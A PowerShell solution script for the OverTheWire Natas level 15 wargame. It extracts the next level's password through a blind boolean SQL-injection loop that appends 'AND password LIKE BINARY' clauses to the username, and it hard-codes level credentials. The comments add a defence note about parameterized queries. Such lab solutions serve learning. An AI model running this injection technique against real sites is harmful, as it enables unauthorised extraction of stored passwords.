#natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
#http://natas15.natas.labs.overthewire.org/index.php?&debug&username=natas16" AND password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh%
# Recovers the natas16 password one character at a time through the blind,
# boolean SQL-injection oracle exposed by Test-Password: the username is
# extended with `AND password LIKE BINARY "<known prefix><candidate>%`, and the
# reply says whether that prefix is correct. BINARY makes the MySQL LIKE
# comparison case-sensitive, which is why upper and lower case candidates are
# tested separately.
# Globals:   none written; calls Get-AuthorizedCredentials and Create-CharacterArray
# Arguments: none
# Returns:   the recovered password once no candidate extends the prefix further
Function BruteForce-Password() {
$credentials = Get-AuthorizedCredentials
$bruteForceArray = Create-CharacterArray
$password = ''
$continueCracking = $true
# $continueCracking is never cleared; the only way out of this loop is the
# `return` at the bottom of the for body.
while($continueCracking) {
# Two-clause for: there is no iterator expression, $i is advanced or reset
# explicitly in the body. The `-le` bound is loose, but the `-ge` check below
# returns before $i is ever used to index at .length.
for($i=0; $i -le $bruteforceArray.length) {
$testCharacter = $bruteforceArray[$i]
# SQL injection query used to test whether the user natas16 exists AND the
# password starts with the prefix found so far plus the candidate character
$sqlQuery = "natas16`" AND password LIKE BINARY `"$password$testCharacter%"
$results = Test-Password $credentials $sqlQuery
if ($results -eq $true) {
# Prefix confirmed: commit the character and restart the scan for the next position
$password += $testCharacter
Write-Host "PASSED - Adding '$testCharacter' to password."
Write-Host "PASSWORD: $password"
$i = 0
} else {
Write-Host "FAILED - '$testCharacter' does not match the current position. Testing next character"
$i++
}
# Every candidate failed at this position, so the prefix is the whole password
if ($i -ge $bruteforceArray.length) {
Write-Host "All possible characters have been exhausted. End of password has been reached."
return $password
}
}
}
}
# Builds the PSCredential used to authenticate to
# http://natas15.natas.labs.overthewire.org (consumed by Invoke-WebRequest
# -Credential in Test-Password).
# NOTE(review): the level password is hard-coded in clear text; outside a public
# wargame it should be read from an environment variable or a protected file.
# Arguments: none
# Returns:   a PSCredential for user natas15
Function Get-AuthorizedCredentials() {
$user = 'natas15'
$secret = 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J' | ConvertTo-SecureString -AsPlainText -Force
return New-Object System.Management.Automation.PSCredential($user, $secret)
}
# Builds the candidate alphabet for the brute force: A-Z, a-z, then 0-9
# (62 entries, in that order). Letters are [char] values produced from their
# code points; the digits are left as the integers 0..9, which interpolate
# into the query string identically.
# Arguments: none
# Returns:   an object array holding the 62 candidates
Function Create-CharacterArray() {
$upper = [char[]](([int][char]'A')..([int][char]'Z'))
$lower = [char[]](([int][char]'a')..([int][char]'z'))
$digits = 0..9
$alphabet = $upper + $lower + $digits
return $alphabet
}
# Sends one probe to the level page with the injected username and reports
# whether the reply contained the word 'exists' — the single bit per request
# that the blind SQL-injection loop in BruteForce-Password consumes.
# Arguments: $credentials - PSCredential for the level's HTTP authentication
#            $sqlQuery    - the username value, including the injected SQL tail
# Returns:   $true when 'exists' appears in the response body, $false otherwise
# Defence note: this oracle exists only because the username is concatenated
# into the query server-side; a parameterized query removes it.
Function Test-Password($credentials, $sqlQuery) {
# Captures the response of the web request using the POST HTTP method.
# $sqlQuery is embedded directly in the URL query string as the username value.
$httpResponse = Invoke-WebRequest -Method 'POST' -Uri "http://natas15.natas.labs.overthewire.org/index.php?&debug&username=$sqlQuery" -Credential $credentials
# Checks to see if the string 'exists' is present in the HTTP response body
# (ordinal, case-sensitive .NET String.Contains)
if ($httpResponse.Content.Contains('exists')) {
return $true
} else {
return $false
}
}
# Script entry point: run the brute force, then print the result and the
# wall-clock time it took (a TimeSpan, printed in its default format).
$stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
$crackedPassword = BruteForce-Password
$stopwatch.Stop()
$totalTime = $stopwatch.Elapsed
Write-Host "The cracked password is: $($crackedPassword)"
Write-Host $totalTime